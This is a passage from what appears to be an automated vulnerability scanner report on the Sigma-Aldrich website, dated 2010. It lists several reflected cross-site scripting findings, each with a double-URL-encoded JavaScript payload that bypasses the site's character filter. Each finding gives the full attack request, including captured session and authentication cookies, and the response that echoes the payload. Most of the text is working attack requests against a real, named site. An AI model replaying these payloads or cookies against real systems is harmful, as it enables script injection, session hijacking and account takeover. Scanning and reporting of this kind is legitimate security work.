Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:18 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis228fc";alert(1)//2869de04022/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.93. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2709f%2522%253balert%25281%2529%252f%252f9678c1644d6 was submitted in the REST URL parameter 6. This input was echoed as 2709f";alert(1)//9678c1644d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog2709f%2522%253balert%25281%2529%252f%252f9678c1644d6 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog2709f";alert(1)//9678c1644d6","E404") ;
   </script>
...[SNIP]...

1.94. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b13e8%2522%253balert%25281%2529%252f%252f355ca655f70 was submitted in the REST URL parameter 1. This input was echoed as b13e8";alert(1)//355ca655f70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentb13e8%2522%253balert%25281%2529%252f%252f355ca655f70/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentb13e8";alert(1)//355ca655f70/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents","E404") ;
   </script>
...[SNIP]...

1.95. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaa45%2522%253balert%25281%2529%252f%252ff70af8ceeb6 was submitted in the REST URL parameter 2. This input was echoed as eaa45";alert(1)//f70af8ceeb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldricheaa45%2522%253balert%25281%2529%252f%252ff70af8ceeb6/areas-of-interest/chemistry/stockroom-reagents HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldricheaa45";alert(1)//f70af8ceeb6/areas-of-interest/chemistry/stockroom-reagents","E404") ;
   </script>
...[SNIP]...

1.96. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e060%2522%253balert%25281%2529%252f%252f6f78925408c was submitted in the REST URL parameter 3. This input was echoed as 6e060";alert(1)//6f78925408c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest6e060%2522%253balert%25281%2529%252f%252f6f78925408c/chemistry/stockroom-reagents HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:10 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest6e060";alert(1)//6f78925408c/chemistry/stockroom-reagents","E404") ;
   </script>
...[SNIP]...

1.97. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c1b7%2522%253balert%25281%2529%252f%252fa5911bef3e6 was submitted in the REST URL parameter 4. This input was echoed as 8c1b7";alert(1)//a5911bef3e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry8c1b7%2522%253balert%25281%2529%252f%252fa5911bef3e6/stockroom-reagents HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
